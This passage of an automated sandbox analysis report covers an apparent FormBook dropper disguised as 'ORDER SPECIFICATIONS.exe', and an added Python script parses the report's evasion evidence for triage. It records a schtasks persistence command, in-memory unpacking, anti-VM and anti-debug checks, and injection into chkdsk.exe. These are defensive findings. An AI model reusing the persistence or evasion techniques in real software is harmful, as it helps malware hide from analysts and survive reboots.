            Source: Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: ORDER SPECIFICATIONS.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: LvZiFDk.exe.0.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041C9A6 pushfd ; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00407206 push es; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0040CC22 pushad ; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00415597 push ss; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0040B6F8 push ecx; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0151D0D1 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE1EFD push esp; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE0268 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2C56 push ebp; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE4657 push esi; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2E40 push es; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE0621 push edx; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE4FDA pushad ; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE29CB push edx; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE295D push edx; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE015B push ebp; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2556 push 9A36B996h; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE1F37 push edx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0559D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBC9A6 pushfd ; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA7206 push es; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3A5 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3FB push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3F2 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BACC22 pushad ; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB45C push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB5597 push ss; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.43400315564
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Roaming\LvZiFDk.exe

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara matchFile source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER SPECIFICATIONS.exe PID: 6336, type: MEMORY
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000BA85E4 second address: 0000000000BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000BA896E second address: 0000000000BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6340Thread sleep time: -102106s >= -30000s
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6356Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5848Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 768Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: explorer.exe, 00000007.00000000.278443564.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000002.504681708.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000002.504750935.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.259001447.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000007.00000002.511293528.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00409B10 LdrLoadDll,
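            The evasion evidence above is a flat list of behaviour lines in which the sandbox glues the event name straight onto the source path. The script below is an added triage helper, not part of the Joe Sandbox report or of FormBook, that parses lines of that shape and reduces them to the facts an analyst wants: the two RDTSC reads and the byte gap between them, sleeps at or above the sandbox threshold (922337203685477 is INT64_MAX // 10**4, the largest NtDelayExecution interval the report can express, so that thread never wakes on its own), which products the flagged strings point at, how many fs:[30h] PEB reads each function contains, and the DebugPort queries. The ARTIFACTS table and the 64 KiB grouping in rebased_copies are this example's own assumptions; the sample lines are copied from the section above and embedded as constructed input so the code runs offline.

```python
import re
from collections import Counter, defaultdict

# Constructed sample input: behaviour lines copied from the report above, in
# its own shape ("Source: <process or memory dump><Event>: <detail>").
SAMPLE_LINES = [
    "Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL",
    "Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME",
    "Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    "Source: C:\\Windows\\SysWOW64\\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000BA85E4 second address: 0000000000BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exe TID: 6340Thread sleep time: -102106s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exe TID: 6356Thread sleep time: -922337203685477s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exeProcess queried: DebugPort",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Users\\user\\Desktop\\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov ecx, dword ptr fs:[00000030h]",
]

# Event names the report glues directly onto the source; the lazy source group
# stops at the first one that appears.
EVENTS = [
    "Binary or memory string", "RDTSC instruction interceptor", "Thread sleep time",
    "Thread delayed", "Code function", "Process queried", "Process information queried",
    "Process information set", "File opened / queried", "Yara match", "Last function",
]
LINE_RE = re.compile(
    r"^Source: (?P<source>.*?)(?P<event>" + "|".join(re.escape(e) for e in EVENTS) + r")(?P<detail>.*)$"
)
RDTSC_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+)")
SLEEP_RE = re.compile(r"-(\d+)s >= -(\d+)s")
PEB_RE = re.compile(r"(\d+_\d+_[0-9A-Fa-f]+) mov (\w+), dword ptr fs:\[00000030h\]")

# 922337203685477 == INT64_MAX // 10**4: the largest delay the report can show,
# i.e. a thread that never wakes on its own.
MAX_DELAY = (2**63 - 1) // 10**4

# Assumed table for this example: substring of a flagged string -> product it reveals.
ARTIFACTS = {
    "SBIEDLL": "Sandboxie",
    "WINE_GET_UNIX_FILE_NAME": "Wine",
    "VMWARE": "VMware",
    "VBOX": "VirtualBox",
    "QEMU": "QEMU",
    "HYPER-V": "Hyper-V",
}


def parse_line(line):
    """Split one report line into (source, event, detail); None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    source = m.group("source").strip().rstrip(",")
    detail = m.group("detail").lstrip(": ").strip()
    return source, m.group("event"), detail


def summarize(lines):
    """Reduce the evasion evidence to the facts an analyst wants at a glance."""
    summary = {
        "rdtsc_pairs": [],        # (source, first addr, second addr, byte gap)
        "long_sleeps": [],        # (source, seconds, never_wakes)
        "artifacts": Counter(),   # product -> number of strings referencing it
        "peb_reads": Counter(),   # function id -> fs:[30h] (PEB) reads inside it
        "debugport_queries": 0,   # ProcessDebugPort queries (debugger check)
    }
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        source, event, detail = parsed
        if event == "RDTSC instruction interceptor":
            m = RDTSC_RE.search(detail)
            if m:
                first, second = int(m.group(1), 16), int(m.group(2), 16)
                summary["rdtsc_pairs"].append((source, first, second, second - first))
        elif event == "Thread sleep time":
            m = SLEEP_RE.search(detail)
            if m:
                secs, threshold = int(m.group(1)), int(m.group(2))
                if secs >= threshold:
                    summary["long_sleeps"].append((source, secs, secs >= MAX_DELAY))
        elif event == "Binary or memory string":
            upper = detail.upper()
            for needle, product in ARTIFACTS.items():
                if needle in upper:
                    summary["artifacts"][product] += 1
        elif event == "Code function":
            m = PEB_RE.search(detail)
            if m:
                summary["peb_reads"][m.group(1)] += 1
        elif event == "Process queried" and "DebugPort" in detail:
            summary["debugport_queries"] += 1
    return summary


def rebased_copies(rdtsc_pairs):
    """Group RDTSC stubs by offset inside a 64 KiB window: the same offset in two
    processes is the same code mapped at a new base, which is what the process
    hollowing of chkdsk.exe reported above would produce (inference, not proof)."""
    by_offset = defaultdict(set)
    for source, first, _second, _gap in rdtsc_pairs:
        by_offset[first & 0xFFFF].add(source)
    return {off: sorted(srcs) for off, srcs in by_offset.items() if len(srcs) > 1}


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("rebased stubs:", rebased_copies(result["rdtsc_pairs"]))
```

            Run against the whole report rather than the embedded sample, the same functions show that both RDTSC pairs are six bytes apart (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) and that the pair found in chkdsk.exe sits at the same 64 KiB offset (0x85E4) as the one in the original sample, consistent with the injected payload rather than chkdsk's own code performing the timing check.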
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015541E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015469A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01582073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01591074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C58EC mov eax, dword ptr fs:[00000030h]
